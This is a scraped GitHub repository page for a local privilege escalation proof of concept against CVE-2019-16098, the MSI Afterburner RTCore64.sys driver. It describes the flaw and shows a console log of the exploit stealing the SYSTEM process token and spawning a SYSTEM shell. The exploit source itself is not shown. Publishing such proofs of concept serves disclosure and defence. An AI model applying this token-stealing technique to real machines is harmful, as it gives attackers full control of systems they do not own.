Skip to content
This repository has been archived by the owner on Feb 3, 2020. It is now read-only.

Barakat/CVE-2019-16098

master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Code

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
 
 
 
 

CVE-2019-16098

The driver in Micro-Star MSI Afterburner 4.6.2.15658 (aka RTCore64.sys and RTCore32.sys) allows any authenticated user to read and write to arbitrary memory, I/O ports, and MSRs. This can be exploited for privilege escalation, code execution under high privileges, and information disclosure. These signed drivers can also be used to bypass the Microsoft driver-signing policy to deploy malicious code.

For more updates, visit CVE-2019-16098

WARNING: Hardcoded Windows 10 x64 Version 1903 offsets!

Microsoft Windows [Version 10.0.18362.295]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\Users\Barakat\source\repos\CVE-2019-16098>whoami
Barakat

C:\Users\Barakat\source\repos\CVE-2019-16098>out\build\x64-Debug\CVE-2019-16098.exe
[*] Device object handle has been obtained
[*] Ntoskrnl base address: FFFFF80734200000
[*] PsInitialSystemProcess address: FFFFC288A607F300
[*] System process token: FFFF9703A9E061B0
[*] Current process address: FFFFC288B7959400
[*] Current process token: FFFF9703B9D785F0
[*] Stealing System process token ...
[*] Spawning new shell ...
Microsoft Windows [Version 10.0.18362.295]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\Users\Barakat\source\repos\CVE-2019-16098>whoami
SYSTEM

C:\Users\Barakat\source\repos\CVE-2019-16098>

About

Local privilege escalation PoC exploit for CVE-2019-16098

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published